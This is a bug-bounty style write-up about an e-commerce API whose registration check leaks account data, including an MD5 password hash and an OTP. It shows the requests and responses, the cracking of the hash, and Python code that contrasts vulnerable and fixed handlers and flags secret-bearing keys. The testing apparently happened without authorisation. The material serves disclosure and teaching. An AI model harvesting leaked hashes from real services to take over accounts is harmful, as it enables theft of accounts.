Interesting Account Takeover Bugs

In this article we are going to look at an interesting bug that is not commonly seen in the wild.

protonsec
InfoSec Write-ups


I was working on an e-commerce target which didn’t have any Bug Bounty Program or Vulnerability Disclosure Policy. But luckily I saw that the company had recently applied a patch, and it was showing on the openbugbounty.org page.

So as usual I started the recon and soon collected all the subdomains and the company’s assets, including email and revenue info. I found 2 Reflected Cross Site Scripting bugs and reported them, and I am still waiting, without any hope obviously, for a reply from them. Anyway, coming to the topic.

There was user account registration and login, as almost all websites have.

So I tried to register an account. As soon as I entered my email id, it sent a POST request to the application to check whether an account with that email already exists.

POST /apicallback/webUsers/checkRegistered/ HTTP/2
Host: www.redacted.com
...
...
{
"email":"thisistest123@gmail.com",
"keepLogged":true
}

If there is no user already registered with that email, the response was:

HTTP/2 200 OK
Date: Fri, 04 Nov 2022 11:00:04 GMT
Content-Type: text/html; charset=UTF-8
...
...
{"error":"0","errorMsg":"email id not registered"}

And after the response arrived in the browser, the user is redirected to the password page.

But if an account is already registered with that email, the response contains all of the account’s information: email, date of registration, cart id, the items in the cart and much more, including the MD5 password hash.

HTTP/2 200 OK
Date: Fri, 04 Nov 2022 11:04:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 766
...
...
{"entity_id":"714467","entity_type_id":"1","attribute_set_id":"0","website_id":"1","email":"thisistest123@gmail.com","group_id":"1","store_id":"1","created_at":"2022-11-04 08:27:51","updated_at":"2022-11-04 08:27:49","is_active":"1","batch_id":"3","created_in":"Default Store View","password_hash":"482c811da5d5b4bc6d497ffa98491e38","is_subscribe":1,"addresses":[],"menu_data":[{"page_id":3,"title":"ABOUT US"},{"page_id":4,"title":"CONTACT US"},{"page_id":6,"title":"SHIPPING"},{"page_id":7,"title":"RETURNS"},{"page_id":8,"title":"HELP"},{"page_id":9,"title":"TERMS"},{"page_id":10,"title":"PRIVACY"},{"page_id":11,"title":"CAREERS"}],"caching_time":900,"image_caching_time":90000,"Cards":[],"cardsCount":0,"error":"1","errorMsg":"User already exist","otp":938061}

Here is the actual image.

[image: screenshot of the response]

If you look closely at the response, you will see the password_hash field.

[image: close-up of the response]

So I instantly copied the MD5 password hash and cracked it (MD5 is a hash, not an encoding, so it cannot be decoded; but the unsalted MD5 of a common password is found instantly in any hash lookup table).

[image: hash lookup result]

And retrieved the password: password123.
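To make the root cause concrete, here is an added example (not the target's code, which is unknown) of a hypothetical handler for the checkRegistered endpoint written two ways: one that serialises the whole customer entity, as the response above shows, and one that returns only an allowlisted shape. It also includes a small response audit that flags sensitive key names, and a check showing why the leaked unsalted MD5 hash was an instant takeover. The user record and the SENSITIVE_KEYS list are constructed for the example; the hash value is the one from the writeup.

```python
import hashlib
import json

# Constructed sample record, shaped like the leaked response on this page
# (hypothetical backend store; the password_hash value is from the writeup).
USERS = {
    "thisistest123@gmail.com": {
        "entity_id": "714467",
        "email": "thisistest123@gmail.com",
        "created_at": "2022-11-04 08:27:51",
        "password_hash": "482c811da5d5b4bc6d497ffa98491e38",
        "otp": 938061,
    }
}

def check_registered_vulnerable(body: str) -> dict:
    """Mirrors the observed behaviour: the whole customer entity is serialised."""
    email = json.loads(body)["email"]
    user = USERS.get(email)
    if user is None:
        return {"error": "0", "errorMsg": "email id not registered"}
    return {**user, "error": "1", "errorMsg": "User already exist"}

def check_registered_fixed(body: str) -> dict:
    """Hardened: explicit allowlist; the entity object never reaches the serialiser."""
    email = json.loads(body)["email"]
    exists = email in USERS
    return {"error": "1" if exists else "0",
            "errorMsg": "User already exist" if exists else "email id not registered"}

# Constructed denylist of key names that must never appear in a public API response.
SENSITIVE_KEYS = {"password", "password_hash", "otp", "token", "secret"}

def sensitive_keys(obj) -> set:
    """Walk a decoded JSON response and report sensitive key names (unit test / proxy check)."""
    found = set()
    if isinstance(obj, dict):
        for k, v in obj.items():
            if k.lower() in SENSITIVE_KEYS:
                found.add(k)
            found |= sensitive_keys(v)
    elif isinstance(obj, list):
        for item in obj:
            found |= sensitive_keys(item)
    return found

def unsalted_md5_matches(candidate: str, leaked_hash: str) -> bool:
    """Why the leak is an instant takeover: unsalted MD5 of a common password is trivially recognised."""
    return hashlib.md5(candidate.encode()).hexdigest() == leaked_hash
```

Running sensitive_keys() over every JSON response in an integration test suite catches this class of leak before it reaches production, regardless of which field is added to the entity later.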

I instantly made a PoC and reported it to the company.

Thanks for reading.
